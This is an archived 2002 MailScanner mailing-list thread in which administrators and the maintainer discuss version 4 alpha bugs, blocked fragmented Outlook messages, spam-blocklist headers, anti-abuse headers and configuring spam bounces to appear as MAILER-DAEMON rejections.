>Many thanks to Tal Kelrich for watching BugTraq like a hawk :-) > >Jules. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sat Sep 28 01:14:19 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: Sender reports In-Reply-To: Message-ID: <5.1.0.14.2.20020928011309.03cff798@imap.ecs.soton.ac.uk> Well spotted. I had "$logtext" and "$usertext" the wrong way round in line 163 of SweepOther.pm, if you want to fix it yourself. The fix will be in the next release of V4. If that's the worst that is wrong with it now, I'm pretty happy :-) At 21:35 27/09/2002, you wrote: >Julian, in 3.x when a blocked attachment was blocked, the message sent >back to the sender, contained info from the fourth column in the >filenames.rules.conf, but in 4.0 it doesn't seem to include this info. >Example, the .reg rule has a 4th column of "Windows registry entries are >very dangerous in email" but this is missing in the report back. > > >The following e-mail messages were found to have viruses in them: > > Sender: root@med.wayne.edu >IP Address: 146.9.19.19 > Recipient: brose@med.wayne.edu > Subject: etst > MessageID: g8RKJviZ012777 > Report: Possible Windows registry attack (crontab.reg) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From zhangm at R3.SANYOSHK.COM Sat Sep 28 09:35:14 2002 From: zhangm at R3.SANYOSHK.COM (Zhang Ming(r3)) Date: Thu Jan 12 21:15:47 2006 Subject: Signature for outgoing messages References: <003701c2566f$90eee890$6501a8c0@mikedesk> Message-ID: <03fe01c266c9$f7a4af60$9700a8c0@mis1n> Dear all, Just installed a newest mailscanner in our new mail server. but when user want split the mail to several parts in outlook express to limitied the mail capacity, the mail scanner will reject such mail . can anyone tell me how to allow user to send such mails? Thanks! -----------------error msg The following e-mail messages were found to have viruses in them: Sender: IP address: 203.198.224.115 Recipient: Subject: {VIRUS?} Fw: 13 13.doc [3/3] MessageID: g8S8Jr429841 Report: Fragmented messages cannot be reliably scanned -- MailScanner Email Virus Scanner From zhangm at R3.SANYOSHK.COM Sat Sep 28 10:30:24 2002 From: zhangm at R3.SANYOSHK.COM (Zhang Ming(r3)) Date: Thu Jan 12 21:15:47 2006 Subject: Report: Fragmented messages cannot be reliably scanned ? References: <003701c2566f$90eee890$6501a8c0@mikedesk> <03fe01c266c9$f7a4af60$9700a8c0@mis1n> Message-ID: <04a201c266d1$acbada80$9700a8c0@mis1n> Sorry All for my previous mail that did not write the subject. so I sumitte again. additional information:I am using Redhat 7.3 and mcafee ----- Original Message ----- From: "Zhang Ming(r3)" To: Sent: Saturday, September 28, 2002 4:35 PM Subject: Re: Signature for outgoing messages > Dear all, > > Just installed a newest mailscanner in our new mail server. but when user > want split the mail to several parts in outlook express to limitied the mail > capacity, the mail scanner will reject such mail . can anyone tell me how to > allow user to send such mails? > > Thanks! > > -----------------error msg > The following e-mail messages were found to have viruses in them: > > Sender: > IP address: 203.198.224.115 > Recipient: > Subject: {VIRUS?} Fw: 13 13.doc [3/3] > MessageID: g8S8Jr429841 > Report: Fragmented messages cannot be reliably scanned > > -- > MailScanner > Email Virus Scanner > From erich at OLYPEN.COM Sat Sep 28 12:21:40 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:47 2006 Subject: Signature for outgoing messages In-Reply-To: <03fe01c266c9$f7a4af60$9700a8c0@mis1n> Message-ID: On Sat, 28 Sep 2002, Zhang Ming(r3) wrote: > Just installed a newest mailscanner in our new mail server. but when user > want split the mail to several parts in outlook express to limitied the mail > capacity, the mail scanner will reject such mail . can anyone tell me how to > allow user to send such mails? I think you are running up against the reality that the way Microsoft has implemented this splitting up of large messages is fundamentally a bad idea and hazardous from a security viewpoint. The reason email admins limit attachment size is because email is not the correct protocol for moving large files. Microsoft came up with a squirrelly way to allow dimwits the ability to circumvent the admin's attempt to stop the behavior and did it in their typical fashion of complete lack of awareness of security. In other words, and please forgive my language, it was really an asshole thing for Microsoft to do. I find it amusing that this issue has gotten so much attention recently. Outbreak has had this "capability" for quite some time now and fortunately most people have remained unaware of it, but the recent BugTraq posting lit a fire under a bunch of folks and now of course every script kiddie in the world now knows about it. Another example of Microsoft costing everyone else a ton of money to compensate for Microsoft ineptitude. I just flat won't support Outlook doing that. Any person who truly needs to split up a file to mail can do it much more appropriately with an archiver and I notice the unix/linux "split" command is quite prevalent. Eric From a.phillips at MET.NO Sat Sep 28 13:33:52 2002 From: a.phillips at MET.NO (Adrian Phillips) Date: Thu Jan 12 21:15:47 2006 Subject: Signature for outgoing messages In-Reply-To: References: Message-ID: >>>>> "Eric" == Eric H writes: Eric> On Sat, 28 Sep 2002, Zhang Ming(r3) wrote: >> Just installed a newest mailscanner in our new mail server. but >> when user want split the mail to several parts in outlook >> express to limitied the mail capacity, the mail scanner will >> reject such mail . can anyone tell me how to allow user to send >> such mails? Eric> I think you are running up against the reality that the way Eric> Microsoft has implemented this splitting up of large Eric> messages is fundamentally a bad idea and hazardous from a Eric> security viewpoint. Wait a sec. - I'm not a MS fan (quite the opposite) but spltting of large emails into parts has been "standard" for many years now under Unix as well as other Oses.; don't know whether its RFC or not though. Sincerely, Adrian Phillips -- Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [OK] From mike at CAMAROSS.NET Sat Sep 28 14:29:44 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:47 2006 Subject: ANNOUCE: Version 3.23-4 released In-Reply-To: <001801c266f0$df084300$6501a8c0@mikedesk> Message-ID: <001a01c266f3$1c584c30$6501a8c0@mikedesk> Ugh...nevermind! PID file = changed to PID dir = Sorry about that :) Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Mike Kercher Sent: Saturday, September 28, 2002 8:14 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: ANNOUCE: Version 3.23-4 released I tried loading v4.00.0a7 this morning and this is what I get when starting MS: [root@redline opt]# Syntax error in line 0, directory for piddir does not exist at MailScanner/Config.pm line 1059 I did the same thing I had done with the other versions...untarring to /opt and changing the symlink for /opt/MailScanner to point to the correct revision dir. In my mailscanner.conf, the PID file = /opt/MailScanner/var/mailscanner.pid path is correct. Anyone else seen this? I had to go back to v4.00.0a6 Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Friday, September 27, 2002 1:13 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: ANNOUCE: Version 3.23-4 released I meant to add that there is also a new release to V4 which includes this fix, as well as a few other new features. According to my WHATSNEW.txt in V4.... - "/etc/rc.d/init.d/MailScanner reload" or "service MailScanner reload" now work (or they will when I produce the RPMs). - Checks for, and corrects, MIME boundaries where an outer multipart/mixed boundary is a substring of an inner multipart/alternative boundary, as this causes problems for the Cyrus IMAP server and a few versions of Eudora still in use. - Checks for, and removes, messages containing external bodies that, according to RFC2046, can be held on external servers and are retrieved by FTP among other methods. Note this requires a 3rd patch to the MIME- tools modules which you will have to download from www.mailscanner.info. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Sat Sep 28 12:03:37 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:47 2006 Subject: MAILSCANNER: shrepan@YAHOO.COM requested to join Message-ID: <200209281103.MAA24512@magpie.ecs.soton.ac.uk> Sat, 28 Sep 2002 12:03:37 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Pavithra Reddy . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER shrepan@YAHOO.COM Pavithra Reddy The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+shrepan%40YAHOO.COM+Pavithra+Reddy&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mike at CAMAROSS.NET Sat Sep 28 14:13:42 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:47 2006 Subject: ANNOUCE: Version 3.23-4 released In-Reply-To: <5.1.0.14.2.20020927191135.02e288b0@imap.ecs.soton.ac.uk> Message-ID: <001801c266f0$df084300$6501a8c0@mikedesk> I tried loading v4.00.0a7 this morning and this is what I get when starting MS: [root@redline opt]# Syntax error in line 0, directory for piddir does not exist at MailScanner/Config.pm line 1059 I did the same thing I had done with the other versions...untarring to /opt and changing the symlink for /opt/MailScanner to point to the correct revision dir. In my mailscanner.conf, the PID file = /opt/MailScanner/var/mailscanner.pid path is correct. Anyone else seen this? I had to go back to v4.00.0a6 Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Friday, September 27, 2002 1:13 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: ANNOUCE: Version 3.23-4 released I meant to add that there is also a new release to V4 which includes this fix, as well as a few other new features. According to my WHATSNEW.txt in V4.... - "/etc/rc.d/init.d/MailScanner reload" or "service MailScanner reload" now work (or they will when I produce the RPMs). - Checks for, and corrects, MIME boundaries where an outer multipart/mixed boundary is a substring of an inner multipart/alternative boundary, as this causes problems for the Cyrus IMAP server and a few versions of Eudora still in use. - Checks for, and removes, messages containing external bodies that, according to RFC2046, can be held on external servers and are retrieved by FTP among other methods. Note this requires a 3rd patch to the MIME- tools modules which you will have to download from www.mailscanner.info. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sat Sep 28 15:39:21 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: ANNOUCE: Version 3.23-4 released In-Reply-To: <001801c266f0$df084300$6501a8c0@mikedesk> References: <5.1.0.14.2.20020927191135.02e288b0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020928153251.03718008@imap.ecs.soton.ac.uk> At 14:13 28/09/2002, you wrote: >I tried loading v4.00.0a7 this morning and this is what I get when >starting MS: > >[root@redline opt]# Syntax error in line 0, directory for piddir does >not exist at MailScanner/Config.pm line 1059 The parser still isn't quite right. >I did the same thing I had done with the other versions...untarring to >/opt and changing the symlink for /opt/MailScanner to point to the >correct revision dir. In my mailscanner.conf, the PID file = >/opt/MailScanner/var/mailscanner.pid path is correct. Anyone else seen >this? I had to go back to v4.00.0a6 I've changed the pid file into a pid dir, so it can store all the pid files in 1 place. mailscanner.conf now says PID dir = /opt/MailScanner/var >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On >Behalf Of Julian Field >Sent: Friday, September 27, 2002 1:13 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: ANNOUCE: Version 3.23-4 released > > >I meant to add that there is also a new release to V4 which includes >this fix, as well as a few other new features. > >According to my WHATSNEW.txt in V4.... > >- "/etc/rc.d/init.d/MailScanner reload" or "service MailScanner reload" >now > work (or they will when I produce the RPMs). >- Checks for, and corrects, MIME boundaries where an outer >multipart/mixed > boundary is a substring of an inner multipart/alternative boundary, > as this causes problems for the Cyrus IMAP server and a few versions >of > Eudora still in use. >- Checks for, and removes, messages containing external bodies that, > according to RFC2046, can be held on external servers and are >retrieved > by FTP among other methods. Note this requires a 3rd patch to the >MIME- > tools modules which you will have to download from >www.mailscanner.info. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sat Sep 28 15:58:47 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: Signature for outgoing messages In-Reply-To: References: Message-ID: <5.1.0.14.2.20020928155706.036e8f68@imap.ecs.soton.ac.uk> At 13:33 28/09/2002, you wrote: > >>>>> "Eric" == Eric H writes: > Eric> On Sat, 28 Sep 2002, Zhang Ming(r3) wrote: > >> Just installed a newest mailscanner in our new mail server. but > >> when user want split the mail to several parts in outlook > >> express to limitied the mail capacity, the mail scanner will > >> reject such mail . can anyone tell me how to allow user to send > >> such mails? > > Eric> I think you are running up against the reality that the way > Eric> Microsoft has implemented this splitting up of large > Eric> messages is fundamentally a bad idea and hazardous from a > Eric> security viewpoint. > >Wait a sec. - I'm not a MS fan (quite the opposite) but spltting of >large emails into parts has been "standard" for many years now under >Unix as well as other Oses.; don't know whether its RFC or not though. The point is that Microsoft OSes suffer a lot of viruses, and therefore any message using this feature is very dangerous. Left in the hands of just the Unix folks (with far fewer viruses around), it was never really a dangerous thing to do. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From a.phillips at MET.NO Sat Sep 28 16:23:24 2002 From: a.phillips at MET.NO (Adrian Phillips) Date: Thu Jan 12 21:15:47 2006 Subject: Signature for outgoing messages In-Reply-To: <5.1.0.14.2.20020928155706.036e8f68@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020928155706.036e8f68@imap.ecs.soton.ac.uk> Message-ID: >>>>> "Julian" == Julian Field writes: Eric> I think you are running up against the reality that the way Eric> Microsoft has implemented this splitting up of large Eric> messages is fundamentally a bad idea and hazardous from a Eric> security viewpoint. >> Wait a sec. - I'm not a MS fan (quite the opposite) but >> spltting of large emails into parts has been "standard" for >> many years now under Unix as well as other Oses.; don't know >> whether its RFC or not though. Julian> The point is that Microsoft OSes suffer a lot of viruses, Julian> and therefore any message using this feature is very Julian> dangerous. Left in the hands of just the Unix folks (with Julian> far fewer viruses around), it was never really a dangerous Julian> thing to do. -- Julian Field Teaching Systems Manager I wasn't arguing whether this feature is dangerous or not, just the "MS had done it and screwed up" argument. They haven't done anything different in this case to other Oses just that it makes life harder because Windows software has been generally implemented in an insecure way. Sincerely, Adrian Phillips -- Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [OK] From hciss at HCIWS.COM Sat Sep 28 18:50:54 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:47 2006 Subject: X-MailScanner-SpamCheck: Message-ID: <002801c26717$9e8091d0$6401a8c0@matthewmpqowmc> Would it be possible to note in the header what balck lists it was checked against? That way the end recipient would know what there postmaster is doing about spam. Something like: X-MailScanner-SpamCheck: spamcop.net->not listed Perhaps a bad idea, I dunno. It just seems to me that it lets the end user know what is going on. Matt From raymond at PROLOCATION.NET Sat Sep 28 18:53:20 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:47 2006 Subject: X-MailScanner-SpamCheck: In-Reply-To: <002801c26717$9e8091d0$6401a8c0@matthewmpqowmc> Message-ID: Hi! > Something like: X-MailScanner-SpamCheck: spamcop.net->not listed > > Perhaps a bad idea, I dunno. It just seems to me that it lets the end user > know what is going on. I think its more of interest if its marked as SPAM what one DID list it :) If you check against 10 lists you dont want 10 lines ... Bye Raymond. From info at BLACKNIGHT-SOLUTIONS.COM Sat Sep 28 19:18:17 2002 From: info at BLACKNIGHT-SOLUTIONS.COM (Blacknight Solutions) Date: Thu Jan 12 21:15:47 2006 Subject: Offtopic: Email header query In-Reply-To: <002801c26717$9e8091d0$6401a8c0@matthewmpqowmc> Message-ID: <5.1.1.6.0.20020928201558.02236ca8@blacknightsolutions.com> Hi all, I have a query regarding email headers in general, though not specifically related to Mailscanner. I notice that quite a few people's messages include a number of anti-abuse headers. Presumably this is setup somewhere in sendmail, but after searching all the obvious places I am yet to find out how to set this up. Any ideas? Thanks in advance. Michele Mr. Michele Neylon Blacknight Solutions - affordable linux hosting http://www.blacknightsolutions.com/ From brose at MED.WAYNE.EDU Sat Sep 28 19:15:51 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:47 2006 Subject: Spam bounce message Message-ID: I've been playing with this in 4.0 and was wondering... Wouldn't it better for MS to bounce back the message in such a way that it appears to be a Mailer-Daemon rejection message? Basically making it appear to have come from the MTA? I wouldn't think spammers are going to look that closely at the header and see that it's not a real bounce. If the bounce message appears to be a rejection then "maybe" and I do mean maybe, the address would get removed from their list. -=B From mike at CAMAROSS.NET Sat Sep 28 19:49:30 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:47 2006 Subject: X-MailScanner-SpamCheck: In-Reply-To: <002801c26717$9e8091d0$6401a8c0@matthewmpqowmc> Message-ID: How many users actually read the headers? How many users actually know what a header is? :) -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Sent: Saturday, September 28, 2002 12:51 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: X-MailScanner-SpamCheck: Would it be possible to note in the header what balck lists it was checked against? That way the end recipient would know what there postmaster is doing about spam. Something like: X-MailScanner-SpamCheck: spamcop.net->not listed Perhaps a bad idea, I dunno. It just seems to me that it lets the end user know what is going on. Matt From mike at CAMAROSS.NET Sat Sep 28 19:51:25 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:47 2006 Subject: Offtopic: Email header query In-Reply-To: <5.1.1.6.0.20020928201558.02236ca8@blacknightsolutions.com> Message-ID: Can you post an example of what you're talking about? -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Blacknight Solutions Sent: Saturday, September 28, 2002 1:18 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Offtopic: Email header query Hi all, I have a query regarding email headers in general, though not specifically related to Mailscanner. I notice that quite a few people's messages include a number of anti-abuse headers. Presumably this is setup somewhere in sendmail, but after searching all the obvious places I am yet to find out how to set this up. Any ideas? Thanks in advance. Michele Mr. Michele Neylon Blacknight Solutions - affordable linux hosting http://www.blacknightsolutions.com/ From hciss at HCIWS.COM Sat Sep 28 20:06:51 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:47 2006 Subject: X-MailScanner-SpamCheck: References: Message-ID: <006f01c26722$373cb6b0$6401a8c0@matthewmpqowmc> > How many users actually read the headers? How many users actually know what a >header is? :) I do. It would be nice to know what lists were tested on each message. If a certain list timed it be nice to have a note about that as well. Matt > Would it be possible to note in the header what balck lists it was checked > against? That way the end recipient would know what there postmaster is > doing about spam. > > Something like: X-MailScanner-SpamCheck: spamcop.net->not listed > > Perhaps a bad idea, I dunno. It just seems to me that it lets the end user > know what is going on. From hciss at HCIWS.COM Sat Sep 28 20:06:53 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:47 2006 Subject: X-MailScanner-SpamCheck: References: Message-ID: <007001c26722$3a58c3c0$6401a8c0@matthewmpqowmc> > > Something like: X-MailScanner-SpamCheck: spamcop.net->not listed > > > > Perhaps a bad idea, I dunno. It just seems to me that it lets the end user > > know what is going on. > > I think its more of interest if its marked as SPAM what one DID list it :) > If you check against 10 lists you dont want 10 lines ... If the message hits on any of 3 different black lists I am going to bounce it so a clean message will be there only chance to see what lists are used. I am not sure about bouncing yet. Disabled Spamassassin and I am tagging for a month against a few black lists to see what kind false hits we get. Matt From hciss at HCIWS.COM Sat Sep 28 20:11:51 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:47 2006 Subject: Spam bounce message References: Message-ID: <007601c26722$e9e28240$6401a8c0@matthewmpqowmc> If the SMTP server the spammer connected to accepted the message it was already marked quite likely as valid unless they used an open relay. Usually the return address on a SPAM does not work anyway though. Also, just in case of a false hit you would want an explanation to a legitimate sender. Matt > I've been playing with this in 4.0 and was wondering... Wouldn't it > better for MS to bounce back the message in such a way that it appears > to be a Mailer-Daemon rejection message? Basically making it appear to > have come from the MTA? I wouldn't think spammers are going to look > that closely at the header and see that it's not a real bounce. If the > bounce message appears to be a rejection then "maybe" and I do mean > maybe, the address would get removed from their list. From info at BLACKNIGHT-SOLUTIONS.COM Sat Sep 28 20:32:33 2002 From: info at BLACKNIGHT-SOLUTIONS.COM (Blacknight Solutions) Date: Thu Jan 12 21:15:47 2006 Subject: Offtopic: Email header query In-Reply-To: References: <5.1.1.6.0.20020928201558.02236ca8@blacknightsolutions.com> Message-ID: <5.1.1.6.0.20020928212924.0211c5e8@blacknightsolutions.com> At 13.51 28/09/2002 -0500, you wrote: >Can you post an example of what you're talking about? X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - somedoman.com X-AntiAbuse: Original Domain - domain.com X-AntiAbuse: Originator/Caller UID/GID - [32028 529] / [32028 529] X-AntiAbuse: Sender Address Domain - somedomain.com Mr. Michele Neylon Blacknight Solutions - affordable linux hosting http://www.blacknightsolutions.com/ From mailscanner at ecs.soton.ac.uk Sat Sep 28 21:20:22 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: Spam bounce message In-Reply-To: <007601c26722$e9e28240$6401a8c0@matthewmpqowmc> References: Message-ID: <5.1.0.14.2.20020928211931.0251e120@imap.ecs.soton.ac.uk> At 20:11 28/09/2002, you wrote: >If the SMTP server the spammer connected to accepted the message it was >already marked quite likely as valid unless they used an open relay. >Usually the return address on a SPAM does not work anyway though. Also, >just in case of a false hit you would want an explanation to a legitimate >sender. The bounce message can include a list of what traps caught the original spam message (in V4). > > I've been playing with this in 4.0 and was wondering... Wouldn't it > > better for MS to bounce back the message in such a way that it appears > > to be a Mailer-Daemon rejection message? Basically making it appear to > > have come from the MTA? I wouldn't think spammers are going to look > > that closely at the header and see that it's not a real bounce. If the > > bounce message appears to be a rejection then "maybe" and I do mean > > maybe, the address would get removed from their list. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sat Sep 28 21:22:39 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: Offtopic: Email header query In-Reply-To: <5.1.1.6.0.20020928212924.0211c5e8@blacknightsolutions.com> References: <5.1.1.6.0.20020928201558.02236ca8@blacknightsolutions.com> Message-ID: <5.1.0.14.2.20020928212044.0242a090@imap.ecs.soton.ac.uk> At 20:32 28/09/2002, you wrote: >At 13.51 28/09/2002 -0500, you wrote: >>Can you post an example of what you're talking about? >X-AntiAbuse: This header was added to track abuse, please include it with >any abuse report > X-AntiAbuse: Primary Hostname - somedoman.com >X-AntiAbuse: Original Domain - domain.com >X-AntiAbuse: Originator/Caller UID/GID - [32028 529] / [32028 529] >X-AntiAbuse: Sender Address Domain - somedomain.com Most people these days use packages such as Eudora or Outlook and won't even know how to see these headers, so for > 90% of users they are pretty useless. I have a relatively well-informed group of users here at Southampton, and most of them don't know how to do it. They report spam by forwarding the body of the message to me without any headers whatsoever :-( -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sat Sep 28 23:24:48 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: Spam bounce message In-Reply-To: Message-ID: <5.1.0.14.2.20020928232049.024601b0@imap.ecs.soton.ac.uk> At 19:15 28/09/2002, you wrote: >I've been playing with this in 4.0 and was wondering... Wouldn't it >better for MS to bounce back the message in such a way that it appears >to be a Mailer-Daemon rejection message? Basically making it appear to >have come from the MTA? I wouldn't think spammers are going to look >that closely at the header and see that it's not a real bounce. If the >bounce message appears to be a rejection then "maybe" and I do mean >maybe, the address would get removed from their list. If you set the Local Postmaster email address for mail generated on the MailScanner server to be "MAILER-DAEMON" then it should look enough like an MTA bounce to fool most people/systems. Local Postmaster = /opt/MailScanner/etc/rules/local.postmaster.rules And local.postmaster.rules contains something like this From: 127.0.0.1 MAILER-DAEMON@your.domain.com FromTo: default postmaster@your.domain.com Note the 127.0.0.1 check might not work with the current V4 release, as I only just fixed a bug which would have caused an empty IP address for messages created by MailScanner itself. I've got some more testing to do before the next alpha appears. I have just added support for multiple incoming mqueue.in directories. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From brose at MED.WAYNE.EDU Sat Sep 28 23:32:17 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:48 2006 Subject: Spam bounce message Message-ID: Yeh but what I mean is that people have asked before if Mailscanner can reject a SPAM message and though this is the MTA's job, this would be a way to give those people who want to reject the ability to do it from Mailscanner. True it's not a real reject but it does give the appearance. Also my experience has been that users never read the reasons for a rejection or bounce. Yeh it can help a postmaster, but just getting a user to talk to their email admin is a task even with a rejection or bounce message tells them to. What they tend to do is call the person they are trying to email and say they can't email them even though the bounce message tells them to talk to their email admin. The recipient then believes it a problem their email account and you have to get involved. -----Original Message----- From: Matt [mailto:hciss@HCIWS.COM] Sent: Saturday, September 28, 2002 3:12 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Spam bounce message If the SMTP server the spammer connected to accepted the message it was already marked quite likely as valid unless they used an open relay. Usually the return address on a SPAM does not work anyway though. Also, just in case of a false hit you would want an explanation to a legitimate sender. Matt > I've been playing with this in 4.0 and was wondering... Wouldn't it > better for MS to bounce back the message in such a way that it appears > to be a Mailer-Daemon rejection message? Basically making it appear > to have come from the MTA? I wouldn't think spammers are going to > look that closely at the header and see that it's not a real bounce. > If the bounce message appears to be a rejection then "maybe" and I do > mean maybe, the address would get removed from their list. From zhangm at R3.SANYOSHK.COM Sun Sep 29 04:10:02 2002 From: zhangm at R3.SANYOSHK.COM (Zhang Ming(r3)) Date: Thu Jan 12 21:15:48 2006 Subject: Possible Microsoft security vulnerability attack? Message-ID: <016e01c26765$b4574050$0200a8c0@mis1n> Dear All, Sorry again for another question as below mail, I think it is just a subscripted maillist from our user, but why was rejected? and where to enable/disable? OS:RH7.3 MailScanner:3.23-4 Thanks! ----- Original Message ----- From: "MailScanner" To: Sent: Sunday, September 29, 2002 10:49 AM Subject: Warning: E-mail viruses detected > The following e-mail messages were found to have viruses in them: > > Sender: > IP address: 202.108.36.141 > Recipient: > Subject: ־,Ѷ. > MessageID: g8T2nZv08164 > Report: Possible Microsoft security vulnerability attack > > Full headers are: > Return-Path: <$g> > Received: from listserv.cn99.com ([202.108.36.141]) > by hsmlx1.abcshk.com (8.11.6/8.11.6) with ESMTP id g8T2nZv08164 > for ; Sun, 29 Sep 2002 10:49:35 +0800 > Received: from bj2.cn99.com (unknown [202.108.36.143]) > by listserv.cn99.com (Postfix) with SMTP > id 2100B929F3; Sun, 29 Sep 2002 10:49:36 +0800 (CST) > Sender: pazhou_alive-owner@list.cn99.com > List-Unsubscribe: pazhou_alive-request@list.cn99.com?body=unsubscribe > List-Subscribe: pazhou_alive-request@list.cn99.com?body=subscribe > List-Help: bentium@list.cn99.com > List-Archive: http://list.cn99.com/cgi-bin/get_lsts?listname=pazhou_alive > Reply-To: mlist@return.cn99.com > X-Loop: list.cn99.com > Received: by list.cn99.com (Bentium hermes v 1.0); Sun, 29 Sep 2002 10:49:07 +0800 > Precedence: bulk > Delivered-To: pazhou_alive@list.cn99.com > Received: from bj2.cn99.com (bj2.cn99.com [202.108.36.143]) > by list.cn99.com (Postfix) with ESMTP id 764825E178 > for ; Sun, 29 Sep 2002 10:49:07 +0800 (CST) > Received: from 211.159.0.66 > Message-ID: <7107741.1033267747479.JavaMail.bentium@list.cn99.com> > From: pazhou_alive > To: pazhou_alive@list.cn99.com > subject: ־,Ѷ. > Mime-Version: 1.0 > Content-Type: text/html; charset=GBK > Content-Transfer-Encoding: base64 > Date: Sun, 29 Sep 2002 10:49:07 +0800 (CST) > > -- > MailScanner > Email Virus Scanner > From mailscanner at ecs.soton.ac.uk Sun Sep 29 14:44:18 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:48 2006 Subject: Spam bounce message In-Reply-To: Message-ID: <5.1.0.14.2.20020929144349.02545d00@imap.ecs.soton.ac.uk> At 23:32 28/09/2002, you wrote: >Yeh but what I mean is that people have asked before if Mailscanner can >reject a SPAM message Which is why I wrote the "bounce" action in the first place. I think I'm missing your point or something... > and though this is the MTA's job, this would be a >way to give those people who want to reject the ability to do it from >Mailscanner. True it's not a real reject but it does give the >appearance. > >Also my experience has been that users never read the reasons for a >rejection or bounce. Yeh it can help a postmaster, but just getting a >user to talk to their email admin is a task even with a rejection or >bounce message tells them to. What they tend to do is call the person >they are trying to email and say they can't email them even though the >bounce message tells them to talk to their email admin. The recipient >then believes it a problem their email account and you have to get >involved. > >-----Original Message----- >From: Matt [mailto:hciss@HCIWS.COM] >Sent: Saturday, September 28, 2002 3:12 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Spam bounce message > > >If the SMTP server the spammer connected to accepted the message it was >already marked quite likely as valid unless they used an open relay. >Usually the return address on a 